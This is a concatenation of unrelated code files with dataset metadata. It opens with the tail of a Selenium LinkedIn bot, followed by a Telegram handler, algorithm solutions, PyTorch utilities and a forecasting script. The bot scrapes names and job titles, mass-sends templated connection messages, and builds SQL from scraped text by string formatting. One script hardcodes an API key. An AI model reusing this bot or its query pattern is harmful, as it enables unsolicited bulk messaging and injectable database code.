person[\"job_potential\"], person[\"messaged\"])\n # values = ''\n command = 'INSERT INTO people ({}) VALUES({})'.format(columns, values)\n\n try:\n db_cursor.execute(command)\n except DB_ERROR as e:\n print(e)\n except DB_ERROR as e:\n print(e)\n\n def query_db(self, db_connection, select_condition):\n\n target_list = []\n\n statement = \"\"\"\n SELECT * FROM people WHERE {}\n \"\"\".format(select_condition)\n\n try: \n db_cursor = db_connection.cursor()\n db_cursor.execute(statement)\n\n entries = db_cursor.fetchall()\n\n for entry in entries:\n target_list.append(entry)\n\n return target_list\n \n except DB_ERROR as e:\n print(e)\n return\n\n except Exception as e:\n print(e)\n return \n\n def find_not_added(self, db_connection):\n \n try:\n not_added = self.query_db(db_connection, select_condition=\"added='False' AND messaged <> 'True'\" )\n return not_added\n except DB_ERROR as e:\n print(e)\n return \n\n def format_stored_people(self, people_not_yet_added):\n\n people = []\n\n random.shuffle(people_not_yet_added)\n\n for person in people_not_yet_added:\n person_url = person[5]\n person_id = person[0]\n\n person = {\n \"ID\" : person_id,\n \"URL\" : person_url\n }\n\n people.append(person)\n\n return people\n\n def add_friends(self, urls_and_ids, db_connection, num_profiles, add_mode):\n \n profiles_visited = 0\n\n while profiles_visited < num_profiles:\n for url_and_id in urls_and_ids:\n url = url_and_id[\"URL\"]\n ID = url_and_id[\"ID\"]\n self.navigate_to_url(url, random.uniform(3.5, 5.9))\n job_description = self.acquire_job_description()\n first_name, last_name = self.acquire_full_name()\n if add_mode:\n self.connect_to_person()\n self.update_person(url, db_connection, job_description)\n else:\n self.update_database(db_connection, \"SET position_desc = '{}', first_name = '{}', last_name = '{}'\".format(job_description, first_name, last_name), \"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {}'s job description updated to: {}\".format(first_name, last_name, ID, job_description))\n profiles_visited += 1\n\n def update_person(self, candidate_url, db_connection, job_description):\n\n split_url = candidate_url.replace(\"/\", \" \").replace(\"-\", \" \").split()\n \n if len(split_url) == 7:\n ID = split_url[5]\n elif len(split_url) == 6:\n ID = split_url[5]\n elif len(split_url) == 5:\n ID = str(split_url[3]) + str(split_url[4])\n elif len(split_url) == 4:\n ID = split_url[3]\n\n # Returns a DB entry of one person that hasn't been added yet\n # And hasn't been messaged yet\n person_not_connected = self.query_db(db_connection, select_condition=\"WHERE ID = '{}' AND added <> 'True' AND messaged <> 'True'\".format(ID))\n \n if person_not_connected:\n # Mark person as not connected in the DB\n self.update_database(db_connection, sql_set_command=\"SET added = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n\n else:\n # No entries were returned from the DB which means that \n # 1) Entry doesn't exist\n # 2) Entry has been added already\n # 3) Entry has been messaged already\n print(\"Person with the ID {} has already been added\".format(ID))\n\n def connect_to_person(self):\n\n try:\n # Click the connect button\n connect_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n connect_button.click()\n # Wait for browser to load\n time.sleep(2)\n # Click the 'Send now' button\n send_now_button = self.browser.find_element_by_xpath(\"//button[text()='Send now']\")\n send_now_button.click()\n print(\"Person added\")\n return True \n except 
NoSuchElementException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False \n except WebDriverException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False\n except Exception as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False\n\n def acquire_job_description(self):\n current_page = self.get_page_source()\n job_description_with_tags = current_page.find(\"h2\")\n job_description = job_description_with_tags.text\n job_description = str(job_description)\n job_description = job_description.replace(\"\\n\", \"\")\n formatted_js = re.sub(\"\\s\\s+\", \"\", job_description)\n return formatted_js\n\n def acquire_full_name(self):\n\n try:\n current_page = self.get_page_source()\n full_name_with_tags = current_page.find(\"h1\", {\"class\" : \"pv-top-card-section__name\"})\n full_name = full_name_with_tags.text\n full_name = str(full_name)\n full_name = full_name.replace(\"\\n\", \"\")\n full_name = re.sub(\"\\s\\s+\", \"\", full_name)\n split_name = full_name.split(\" \")\n if len(split_name) == 1:\n first_name = split_name[0]\n last_name = 'None'\n if len(split_name) == 2:\n first_name = split_name[0]\n last_name = split_name[1]\n elif len(split_name) > 2:\n first_name = split_name[0]\n last_name = split_name[len(split_name) - 1]\n\n except AttributeError as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n except Exception as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n\n return first_name, last_name\n\n\n def find_updated_job_descriptions(self, db_connection):\n\n matches = []\n\n # Find people who have a job description that haven't been messaged yet\n sql_job_description_command = \"position_desc <> 'None' AND messaged <> 'True'\"\n\n # Execute search in DB\n people_with_job_descriptions = self.query_db(db_connection, select_condition=sql_job_description_command)\n\n for person in people_with_job_descriptions:\n\n # Grab the 6th index of the resultant people from the db\n job_description = person[6]\n\n # Compare the resultant people against the text file for job keywords\n # and compare against the list of elimination keywords\n each_match = self.compare_desc_against_criteria(job_description, person)\n\n if each_match:\n matches.append(each_match)\n\n return matches\n\n\n def compare_desc_against_criteria(self, job_description, person):\n\n SEARCH_CRITERIA_TXT = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'txt/search_criteria.txt')\n \n matches = []\n\n ignore_criteria = [\n \"FCA\", \n \"FCA Fiat Chrysler Automobiles\",\n \"Jeep\",\n \"Operations\", \n \"DHL\", \n \"Chrysler\", \n \"Fiat\", \n \"Mopar\", \n \"Supply Chain\", \n \"WCM\", \n \"Logistics\", \n \"MLM\", \n \"Quality\",\n \"Retail\", \n \"Student\", \n \"Clerical\", \n \"Intern\", \n \"Sales\"\n ]\n \n # Open the text file where I have the keywords defined\n match_criteria = open(SEARCH_CRITERIA_TXT, 'r')\n\n job_description = str(job_description)\n \n for match_description in match_criteria:\n\n # Format the text file so we can iterate properly\n match_description = match_description.strip()\n match_description = match_description.replace(\" \", \"\")\n match_description = str(match_description)\n\n if match_description:\n\n # Read in the list of keywords that we want to ignore\n for ignore_description in ignore_criteria:\n\n # Format them so we can work with them\n 
ignore_description = ignore_description.replace(\" \", \"\")\n ignore_description = str(ignore_description)\n\n # If the target keyword is in their job description\n if match_description in job_description:\n\n # If the name triggers the list of words we want to avoid\n if ignore_description in job_description:\n\n # throw it out\n return \n\n else:\n\n # If we haven't already added it, add it\n if person not in matches:\n\n if person:\n matches.append(person)\n\n match_criteria.close()\n return matches\n\n def get_matching_candidates(self, db_connection):\n\n candidates = []\n\n # query_db already prefixes the condition with WHERE\n sql_search_command = \"job_potential = 'True' AND messaged = 'False'\"\n\n matching_candidates = self.query_db(db_connection, select_condition=sql_search_command)\n\n for candidate in matching_candidates:\n if candidate:\n candidates.append(candidate)\n\n return candidates\n\n\n def message_candidates(self, candidates):\n\n for candidate in candidates:\n ID = candidate[0]\n first_name = candidate[1]\n last_name = candidate[2]\n candidate_url = candidate[5]\n\n if candidate_url:\n self.navigate_to_url(candidate_url, 2)\n page = self.get_page_source()\n\n span_text = page.find(\"span\", {\"class\": \"pv-s-profile-actions__label\"}).text\n if span_text == 'Message':\n self.send_message(ID, first_name, last_name)\n elif span_text == 'Pending':\n print(\"Connection Request is pending for {} {} with the ID {}. Proceeding to the next candidate\".format(first_name, last_name, ID))\n else:\n print(\"Another issue arose, proceeding to the next candidate\")\n\n def message_with_subject(self, first_name):\n\n first_name = first_name.title()\n\n subject = \"Hi {}\".format(first_name)\n\n message = \"\"\"My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n your profile stuck out to me. \n While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping to \n hear from you {}! Have a nice day!\"\"\".format(first_name)\n\n message = message.replace(\"\\n\", \" \")\n message = re.sub(\"\\s\\s+\", \" \", message)\n\n return subject, message\n\n def message_no_subject(self, first_name):\n\n first_name = first_name.title()\n\n message = \"\"\"Hi {}. My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n your profile stuck out to me. \n While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping to \n hear from you {}! 
Have a nice day!\"\"\".format(first_name, first_name)\n\n message = message.replace(\"\\n\", \" \")\n message = re.sub(\"\\s\\s+\", \" \", message)\n\n return message\n\n\n def send_message(self, ID, first_name, last_name):\n\n db_connection = self.open_database()\n\n premium_url = \"https://www.linkedin.com/premium/products\"\n\n send_message_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n send_message_button.click()\n\n time.sleep(2)\n\n current_url = self.browser.current_url\n\n if premium_url in current_url:\n print(\"Messaging {} {} with the ID {} has been forwarded to premium account URL, skipping to next candidate...\".format(first_name, last_name, ID))\n return \n else:\n \n time.sleep(1)\n\n # If there's no issue with the subject form, use the message variant that has a subject line\n subject, message = self.message_with_subject(first_name)\n\n # Begin message with a subject line\n\n try:\n # Type the subject to the candidate\n message_form_subject = self.browser.find_element_by_class_name(\"msg-form__subject\")\n message_form_subject.send_keys(subject)\n\n except NoSuchElementException as e:\n\n # Begin message with no subject line\n\n print(str(e) + \"\\nExecuting message with no subject function...\\n\")\n\n # If there's an issue with the subject form, i.e. it's not there, fall back to the subject-free message;\n # the message itself is typed and submitted once, below\n message = self.message_no_subject(first_name)\n\n except WebDriverException as e:\n print(e)\n return \n\n except Exception as e:\n print(e)\n return \n\n try:\n # Type the message to the candidate\n message_form_message = self.browser.find_element_by_class_name(\"msg-form__contenteditable\")\n message_form_message.send_keys(message)\n print(\"Sending message to {} {} with the ID {}.\".format(first_name, last_name, ID))\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n # Click the submit button\n message_form_submit_button = self.browser.find_element_by_class_name(\"msg-form__send-button\")\n message_form_submit_button.click()\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n self.update_database(db_connection, sql_set_command=\"SET messaged = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {} has been set to 'Messaged' in the database.\".format(first_name, last_name, ID))\n except Exception as e:\n print(e)\n\n db_connection.close()\n\n def update_database(self, db_connection, sql_set_command, sql_where_command):\n\n update_command = \"\"\"\n UPDATE people\n {} \n {}\n 
\"\"\".format(sql_set_command, sql_where_command)\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(update_command)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n return\n except Exception as e:\n print(e)\n return\n\n\n \n\n\n\n\n\n\n \n \n \n\n\n \n\n\n\n\n\n \n\n\n\n","repo_name":"CarnsJalone/LinkedIn_Bot","sub_path":"py_files/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":24298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"19229958256","text":"from aiogram.types import ChatMemberUpdated\nfrom sqlalchemy.orm import selectinload\n\nfrom bot.models import Group, User\nfrom bot.repositories.uow import UnitOfWork\n\n\nasync def invite_member(event: ChatMemberUpdated, uow: UnitOfWork):\n group = await uow.groups.get_by_id(event.chat.id, [selectinload(Group.users)])\n if group is None:\n group = Group(\n id=event.chat.id,\n title=event.chat.title\n )\n await uow.groups.create(group)\n\n user = await uow.groups.get_by_id(event.new_chat_member.user.id, [selectinload(User.groups)])\n if user is None:\n user = User(\n id=event.new_chat_member.user.id,\n username=f\"@{event.new_chat_member.user.username}\"\n if event.new_chat_member.user.username\n else event.new_chat_member.user.full_name\n )\n await uow.groups.create(user)\n\n group.users.append(user)\n","repo_name":"fictadvisor/fice-sc-bot","sub_path":"bot/routes/group/invite_member.py","file_name":"invite_member.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39191267187","text":"\"\"\"\n제출 번호: 47362584\n아이디: adviate\n문제: 2204\n결과: 맞았습니다!!\n메모리: 30840 KB \n시간: 68 ms\n언어: Python 3\n코드 길이: 253 B\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nwhile(True):\n N = int(input())\n if N == 0:\n break\n\n dic = {}\n for i in range(N):\n s = input().rstrip()\n dic[s.lower()] = s\n\n tmp = sorted(list(dic.keys()))\n print(dic[tmp[0]])\n","repo_name":"kryowen/BaekJoon_Solution","sub_path":"PY/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39012890662","text":"##game/status\nimport requests\nimport json\n\n### Key ###\napi = 'b5d5bd555a1501b7324a020b229f7acdbf52afdea9bc2d5f96a74cf6d2e94780'\n### playername ####\nname = 'pia'\n### uid ###\nid = '111113'\n\nstat = requests.get('http://20.196.214.79:5050/game/status?key={api}&playername={name}')\nprint(\"statusRequest:\", stat.content)\nprint(\"status :\", stat.status_code)\n\nview = requests.get(f'http://20.196.214.79:5050/game/view?key={api}&uid={id}')\nprint(\"viewRequest:\", view.content)\nprint(\"status :\", view.status_code)","repo_name":"Jaejuna/Tank_simulator","sub_path":"agents/status_view.py","file_name":"status_view.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72461207790","text":"def normalize(name):\n return list(map(fn, name))\n\ndef fn(s):\n return s[0].upper() + s[1:].lower()\n\n# 测试:\nL1 = ['adam', 'LISA', 'barT']\nL2 = normalize(L1)\nprint(L2)\n\n\n\nfrom functools import reduce\ndef prod(L):\n return reduce(lambda x,y:x*y, L)\n\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\nif prod([3, 5, 7, 9]) == 945:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\ndef str2float(s):\n x1 = s[:s.find('.')]\n y1 = s[s.find('.')+1:]\n 
print(x1,y1)\n x2 = reduce(lambda x,y:x*10+y, map(int,x1))\n y2 = reduce(lambda x,y:x*10+y, map(int,y1)) / (10**len(y1))\n print(x2, y2, x2+y2)\n return x2+y2\n\ndef str2float2(s):\n ss = s.split('.')\n print(ss,list(map(int,ss)))\n return reduce(lambda x,y:x+y/(10**len(ss[1])), map(int,ss)) \n\nresult = str2float2('123.456')\nprint('str2float(\\'123.456\\') =', result)\nif abs(result - 123.456) < 0.00001:\n print('Test passed!')\nelse:\n print('Test failed!')\n\n\n# prime numbers\ndef _odd_iter():\n n = 1\n while True:\n n += 2\n yield n\n\ndef _not_divisible(n):\n return lambda x: x % n > 0\n\ndef primes():\n yield 2\n it = _odd_iter()\n while True:\n n = next(it)\n yield n\n it = filter(_not_divisible(n), it)\n\nfor n in primes():\n if n < 100:\n print(n)\n else:\n break\n\n\n# palindromic numbers \ndef is_palindrome(n):\n return str(n) == str(n)[::-1]\n\n# Test:\noutput = filter(is_palindrome, range(1, 200))\nprint('1~200:', list(output))\nif list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:\n print('Test passed!')\nelse:\n print('Test failed!')\n\n\nL = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\ndef by_name(t):\n return t[0].lower()\n \nL2 = sorted(L, key=by_name)\nprint(L2)\n","repo_name":"vectorxxxx/04-Python","sub_path":"04-函数式编程/函数式编程.py","file_name":"函数式编程.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1145004705","text":"import torch\r\nfrom torch.nn import init\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F \r\nimport functools\r\n\r\ndef load_state_dict(state_dict, net):\r\n model_dict = net.state_dict()\r\n\r\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict} \r\n\r\n for k, v in pretrained_dict.items(): \r\n if v.size() == model_dict[k].size():\r\n model_dict[k] = v\r\n\r\n not_initialized = set()\r\n \r\n for k, v in model_dict.items():\r\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\r\n not_initialized.add(k.split('.')[0])\r\n \r\n print('not initialized', sorted(not_initialized))\r\n net.load_state_dict(model_dict) \r\n\r\n return net\r\n \r\ndef conv3x3(in_planes, out_planes, strd=1, padding=1, bias=False):\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3,\r\n stride=strd, padding=padding, bias=bias)\r\n\r\ndef init_weights(net, init_type='normal', init_gain=0.02):\r\n def init_func(m): # define the initialization function\r\n classname = m.__class__.__name__\r\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\r\n if init_type == 'normal':\r\n init.normal_(m.weight.data, 0.0, init_gain)\r\n elif init_type == 'xavier':\r\n init.xavier_normal_(m.weight.data, gain=init_gain)\r\n elif init_type == 'kaiming':\r\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\r\n elif init_type == 'orthogonal':\r\n init.orthogonal_(m.weight.data, gain=init_gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n init.constant_(m.bias.data, 0.0)\r\n elif classname.find(\r\n 'BatchNorm2d') != -1:\r\n init.normal_(m.weight.data, 1.0, init_gain)\r\n init.constant_(m.bias.data, 0.0)\r\n\r\n print('initialize network with %s' % init_type)\r\n net.apply(init_func)\r\n\r\ndef init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[]):\r\n if len(gpu_ids) > 0:\r\n assert 
(torch.cuda.is_available())\r\n net.to(gpu_ids[0])\r\n net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs\r\n init_weights(net, init_type, init_gain=init_gain)\r\n return net\r\n\r\nclass CustomBCELoss(nn.Module):\r\n def __init__(self, brock=False, gamma=None):\r\n super(CustomBCELoss, self).__init__()\r\n self.brock = brock\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n x_hat = torch.clamp(pred, 1e-5, 1.0-1e-5) # prevent log(0) from happening\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n if self.brock:\r\n x = 3.0*gt - 1.0 # rescaled to [-1,2]\r\n\r\n loss = -(gamma*x*torch.log(x_hat) + (1.0-gamma)*(1.0-x)*torch.log(1.0-x_hat))\r\n else:\r\n loss = -(gamma*gt*torch.log(x_hat) + (1.0-gamma)*(1.0-gt)*torch.log(1.0-x_hat))\r\n\r\n if w is not None:\r\n if len(w.size()) == 1:\r\n w = w[:,None,None] \r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\nclass CustomMSELoss(nn.Module):\r\n def __init__(self, gamma=None):\r\n super(CustomMSELoss, self).__init__()\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n weight = gamma * gt + (1.0-gamma) * (1 - gt)\r\n loss = (weight * (pred - gt).pow(2)).mean()\r\n\r\n if w is not None:\r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\ndef createMLP(dims, norm='bn', activation='relu', last_op=nn.Tanh(), dropout=False):\r\n act = None\r\n if activation == 'relu':\r\n act = nn.ReLU()\r\n if activation == 'lrelu':\r\n act = nn.LeakyReLU()\r\n if activation == 'selu':\r\n act = nn.SELU()\r\n if activation == 'elu':\r\n act = nn.ELU()\r\n if activation == 'prelu':\r\n act = nn.PReLU()\r\n\r\n mlp = []\r\n for i in range(1,len(dims)):\r\n if norm == 'bn':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.BatchNorm1d(dims[i])]\r\n if norm == 'in':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.InstanceNorm1d(dims[i])]\r\n if norm == 'wn':\r\n mlp += [ nn.utils.weight_norm(nn.Linear(dims[i-1], dims[i]), name='weight')]\r\n if norm == 'none':\r\n mlp += [ nn.Linear(dims[i-1], dims[i])]\r\n \r\n if i != len(dims)-1:\r\n if act is not None:\r\n mlp += [act]\r\n if dropout:\r\n mlp += [nn.Dropout(0.2)]\r\n\r\n if last_op is not None:\r\n mlp += [last_op]\r\n\r\n return mlp","repo_name":"Abhilash23x/project_model","sub_path":"lib/net_util.py","file_name":"net_util.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31808782925","text":"\"\"\"\nAssert that the CycleGan model is imported correctly\n\"\"\"\nimport unittest\nimport torch\nimport os\nfrom models.CycleGan import CycleGan\n\ndef numel(net):\n return sum(p.numel() for p in net.parameters())\n\nnet = CycleGan()\n\nclass TestCycleGan(unittest.TestCase):\n def test_cg_nparams(self): \n nparams = numel(net)\n self.assertEqual(nparams, 14142916 * 2)\n \n def test_cg_output_shape(self):\n dirname = os.path.dirname(__file__)\n filename = dirname + '/test_files/input.pt'\n x = torch.load(filename)\n bsize = x.shape[0]\n\n with torch.no_grad():\n y1 = net.genX(x)\n self.assertEqual(y1.shape, (bsize, 3, 256, 256))\n\n y2 = net.genY(x)\n self.assertEqual(y2.shape, (bsize, 3, 256, 256))\n \n z1 = net.disY(y1)\n self.assertEqual(z1.shape, (bsize, 1, 30, 30))\n \n z2 = net.disX(y2)\n self.assertEqual(z2.shape, (bsize, 1, 30, 30))\n \n\nif __name__ == '__main__':\n 
unittest.main()\n\n","repo_name":"deepakhr1999/cyclegans","sub_path":"test/test_cyclegan.py","file_name":"test_cyclegan.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"23957175802","text":"def get_coords():\n with open(\"input\") as f:\n return [tuple([int(x.strip()) for x in x.split(\",\")]) for x in f.read().split(\"\\n\") if len(x) > 0]\n\ndef manhattan_dist(sx, sy, ex, ey):\n return abs(sx - ex) + abs(sy - ey)\n\ndef fill_grid(coords):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n\n grid = [[dict() for x in range(max_x)] for y in range(max_y)]\n\n for (idx, (x, y)) in enumerate(coords):\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n grid[gy][gx][idx] = manhattan_dist(x, y, gx, gy)\n\n return grid\n\ndef get_grid_ids(grid):\n res = grid\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n min_dist = min(grid[gy][gx].values())\n if list(grid[gy][gx].values()).count(min_dist) > 1:\n res[gy][gx] = None\n else:\n res[gy][gx] = [idx for (idx, x) in grid[gy][gx].items() if x == min_dist][0]\n return res\n\ndef get_infinites(grid):\n borders = set()\n for x in grid[0]:\n if x is not None:\n borders.add(x)\n for x in grid[-1]:\n if x is not None:\n borders.add(x)\n for y in grid:\n if y[0] is not None:\n borders.add(y[0])\n if y[-1] is not None:\n borders.add(y[-1])\n\n return borders\n\ndef count_idx(grid, idx):\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] == idx:\n count += 1\n return count\n\ndef get_biggest_region_idx(coords, grid, infinites):\n res = list()\n for (idx, (x, y)) in enumerate(coords):\n if idx in infinites:\n continue\n res.append((idx, count_idx(grid, idx)))\n return max(res, key=lambda x: x[1])\n\ndef get_grid_max_dist_region_size(coords, max_dist):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n grid = [[0 for x in range(max_x)] for y in range(max_y)]\n\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n for (x, y) in coords:\n grid[gy][gx] += manhattan_dist(x, y, gx, gy)\n\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] < max_dist:\n count += 1\n return count\n\ndef run():\n coords = get_coords()\n\n # Get a grid with each item marked with the co-ordinate ID and the\n # Manhattan distance to each cell within the grid\n grid = fill_grid(coords)\n\n # Conver each item in the grid to the ID of the co-ordinate that is closest\n grid_ids = get_grid_ids(grid)\n\n # Get a set of all co-ordinate IDs for co-ordinate regions that are\n # infinitely large (i.e. 
are against the border)\n infinite_items = get_infinites(grid_ids)\n\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)[1]\n )\n )\n\n print(\n \"The size of the region which is at least 10,000 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 10000)\n )\n )\n\ndef run_test():\n coords = [(1, 1), (1, 6), (8, 3), (3, 4), (5, 5), (8, 9)]\n grid = fill_grid(coords)\n grid_ids = get_grid_ids(grid)\n print(grid_ids)\n infinite_items = get_infinites(grid_ids)\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)\n )\n )\n print(\n \"The size of the region which is at least 32 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 32)\n )\n )\n\nrun()\n#run_test()\n","repo_name":"polaris64/advent-of-code","sub_path":"2018/06/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"21790571792","text":"\"\"\"\nthis script equalizes the mean and std of the convolutions of a VGG network.\nIt is used to make the VGG network used in the Gatys et al. style transfer\npaper to be compatible with the VGG network used in the Johnson et al. paper.\nIt equalizes the contribution of each layer to the loss.\n\n./stylevgg \n\n must be a constructor in torchelie.models\n\"\"\"\nimport torch\nfrom torchelie.datasets import FastImageFolder\nimport torchvision.transforms as TF\nimport torchelie.models as tchm\nimport torchelie as tch\nimport sys\n\ntorch.autograd.set_grad_enabled(False)\n\nimagenet_path = sys.argv[2]\n\nmodel = sys.argv[1]\nm = tchm.__dict__[model](1000, pretrained='classification/imagenet')\ndel m.classifier\nm.cuda()\nm.eval()\n\nds = FastImageFolder(imagenet_path,\n transform=TF.Compose([\n TF.Resize(256),\n TF.CenterCrop(224),\n TF.ToTensor(),\n tch.nn.ImageNetInputNorm()\n ]))\n\nbatches = [\n b[0] for _, b in zip(\n range(200), torch.utils.data.DataLoader(\n ds, batch_size=320, shuffle=True))\n]\n\nbatch = batches[0].cuda()\n\n\ndef flatvgg():\n layers = []\n\n def _rec(m):\n if len(list(m.children())) == 0:\n layers.append(m)\n else:\n for mm in m.children():\n _rec(mm)\n\n _rec(m.features)\n return torch.nn.Sequential(*layers)\n\n\nidxs = [\n i for i, nm in enumerate(dict(m.features.named_children()).keys())\n if 'conv' in nm\n]\nflat = flatvgg()\n\nflatidxs = [i for i, l in enumerate(flat) if isinstance(l, torch.nn.Conv2d)]\nprint(flatidxs)\n#flatidxs.append(len(flat))\nprint(dict(m.features.named_children()).keys())\n\nprint('before')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n print(mean.mean(), mean.std())\n\nprev_mean = torch.tensor([1, 1, 1]).cuda()\nfor i in range(len(flatidxs)):\n print('computing', i)\n ms = []\n for b in batches:\n with torch.cuda.amp.autocast():\n out = flat[:flatidxs[i] + 2](b.cuda())\n mean = out.cpu().float().mean(dim=(0, 2, 3))\n del out\n ms.append(mean)\n mean = torch.stack(ms, dim=0).mean(0).cuda()\n flat[flatidxs[i]].weight.data *= (prev_mean[None, :, None, None]\n / mean[:, None, None, None])\n flat[flatidxs[i]].bias.data /= mean\n prev_mean = mean\n\nprint('after')\nfor i in idxs:\n with torch.cuda.amp.autocast():\n out = m.features[:i + 1](batch)\n mean = out.cpu().float().mean(dim=(0, 2, 
3))\n del out\n print(mean.mean(), mean.std())\n\nref = tchm.__dict__[model](\n 1000, pretrained='classification/imagenet').features.cuda()(batch[:128])\nprint((m.features(batch[:128])\n - ref / prev_mean[None, :, None, None]).abs().mean().item())\ntorch.save(m.state_dict(), f'{model}.pth')\n","repo_name":"Vermeille/Torchelie","sub_path":"scripts/stylevgg.py","file_name":"stylevgg.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"38"} +{"seq_id":"43464708948","text":"# Support vector regression forecasting (radial basis function kernel)\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import svm\n\ndataset = pd.read_csv('data_wp.csv')\ndata_input = dataset.iloc[:,:-1].values/1000 \ndata_output = dataset.loc[:,['pt']].values/1000 \ntrainlen = int(len(data_input)*0.8) \ntestlen = int(len(data_input)-trainlen) \n\nX_train = data_input[:trainlen].reshape(trainlen,-1) \ny_train = data_output[:trainlen].reshape(trainlen,1) \nX_test = data_input[trainlen:].reshape(testlen,-1) \ny_test = data_output[trainlen:].reshape(testlen,1) \n\nmodel_svm = svm.SVR(kernel='rbf')\nmodel_svm.fit(X_train,y_train)\npred = model_svm.predict(X_test)\n\nplt.figure(figsize=(12,18))\nplt.subplot(211)\nplt.plot(y_test,color='r')\nplt.plot(pred,color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict value'])\nplt.subplot(212)\nplt.plot(y_test[150:300],color='r')\nplt.plot(pred[150:300],color='k')\nplt.xlabel('Number')\nplt.ylabel('kWh')\nplt.legend(['true value','predict 